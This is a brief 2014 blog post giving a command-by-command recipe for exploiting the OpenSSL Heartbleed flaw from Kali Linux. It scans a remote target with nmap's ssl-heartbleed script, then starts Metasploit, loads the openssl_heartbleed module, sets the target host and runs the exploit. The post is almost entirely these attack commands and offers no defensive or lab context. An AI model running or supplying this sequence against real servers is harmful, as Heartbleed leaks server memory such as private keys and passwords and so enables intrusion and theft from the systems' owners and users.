Tuesday, May 6, 2014

A brief note for ssl-heartbleed exploit on Kali


Reference:

http://www.blackmoreops.com/2014/05/03/detect-exploit-openssl-heartbleed-vulnerability-using-nmap-metasploit-kali-linux/

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb

http://nmap.org/nsedoc/scripts/ssl-heartbleed.html


# <rip> for remote IP (target)


# nmap -sV --script=ssl-heartbleed <rip>
# service postgresql start
# service metasploit start
# msfconsole
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> show options
msf> set RHOSTS <rip>
msf> set verbose true
msf>  exploit
at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)